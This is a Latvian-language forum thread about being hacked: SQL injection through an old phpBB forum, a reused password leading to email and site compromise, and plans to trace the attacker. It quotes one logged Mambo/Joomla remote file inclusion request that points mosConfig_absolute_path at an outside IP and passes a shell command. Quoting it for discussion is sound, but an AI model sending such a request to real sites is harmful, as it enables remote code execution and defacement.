meegjinaat dabuut kaadu kas to lietu pieskata, vai arii nezimantot populaaraas un diemzheel krietni caurumainas gatavas sisteemas, koes citu tev varu ieteikt

vai arii uz registered users only

Nelīdzētu registered user only.
1. Bija vecs projekts ar cauru phpBB forumu, caur kuru veica SQL inject.
2. Es, savā stulbībā, nepadomāju,ka tam mudakam tagad ir mana parole,no SQL izvilkta, ko lietoju vairākos standarta projektos (tas man tagad iemācīs veselīgu paranoju).
3. Mudaks ar šo paroli tika pie viena mana e-maila. Un tur bija logini/paroles vairākiem saitiem. Ko viņš nevilcinājās izmantot. Pie kam ne normāli deface uztaisot, bet nonesot nafig.
4. Tagad raksimies pa Latnet un ML un citu provideru logiem, skatoties transakciju vēsturi. Ja izdosies atrast IP, kas nav proxy - tad man drusku žēl tā huligāna. Projektu īpašnieki ir gatavi vērsties policijā.

Tfu, nu tu saprati - tas biju es.

nu sapratu

laigan celjs idiotisks tb nonesa tevi pateicoties tam ka kaadam aakstam bija caurs phpBB... njaaa nu ta es to sapratu

rodas sajuuta ka vereetu buut ka tu taaa ari neko neatradiisi...

http://r21vo.id.lv/?cat=blog&id=223&sk=0


Tā kā es sekoju līdzi trafikam uz lapu, tad jau kādu laiciņu parādās interesanti ieraksti ar aptuveni šādu pieprasījumu:
/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid ]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/

Pagūglējot, manīju ka mainīgie ar tādiem nosaukumiem un līdzīgos virknējumos tiek izmantoti lapās kuras izmanto Mambo CMS (tagad saucas Joomla). Varētu padomāt ka šams ir caurs..

Ja nopietni, tad mušas runā, ka tas trafiks nāk no "Defacing Tool 2.0 by r3v3ng4ns".

Es tak saku - script kiddy.
Joomlai nupat jauna versija iznaaca, kur esot iepriekšējo caurumi aizlāpīti.

njee es akal sapratu ka tas ir kauakads bots kasshance neatkariigi no cilveeka TB nevis scriptkidy bet vienkaarshi bots ;( un ko tad atradiisi....